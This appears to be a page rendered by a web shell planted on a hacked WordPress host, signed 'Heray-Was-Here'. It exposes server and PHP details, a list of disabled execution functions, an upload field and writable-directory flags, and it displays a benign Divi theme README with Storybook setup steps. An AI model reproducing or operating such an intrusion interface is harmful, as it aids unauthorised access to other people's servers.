Heray-Was-Here
Server : Apache
System : Linux h2web212 4.9.0-0.bpo.12-amd64 #1 SMP Debian 4.9.210-1+deb9u1~deb8u1 (2020-06-09) x86_64
User : uid151901 ( 151901)
PHP Version : 8.0.30
Disable Function : passthru,exec,system,popen,shell_exec,proc_open,pcntl_exec
Directory :  /home/clients/1a5fe23ce93412d9e66659e9f5732f73/web/wp-content/themes/Divi/common/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/clients/1a5fe23ce93412d9e66659e9f5732f73/web/wp-content/themes/Divi/common/README.md
# Common

- Anything here should be pure and not rely on anything from VB, TB, Core, so it can be reused wherever, even outside Divi.
- Only external dependencies allowed.

# Storybook

1. Go into common submodule directory
2. Switch to node version 20 e.g `nvm use 20`
3. Run `corepack enable` to activate [Corepack](https://nodejs.org/api/corepack.html)
4. Run `yarn set version berry`
5. Run `yarn install`
6. Run `yarn storybook`

Hry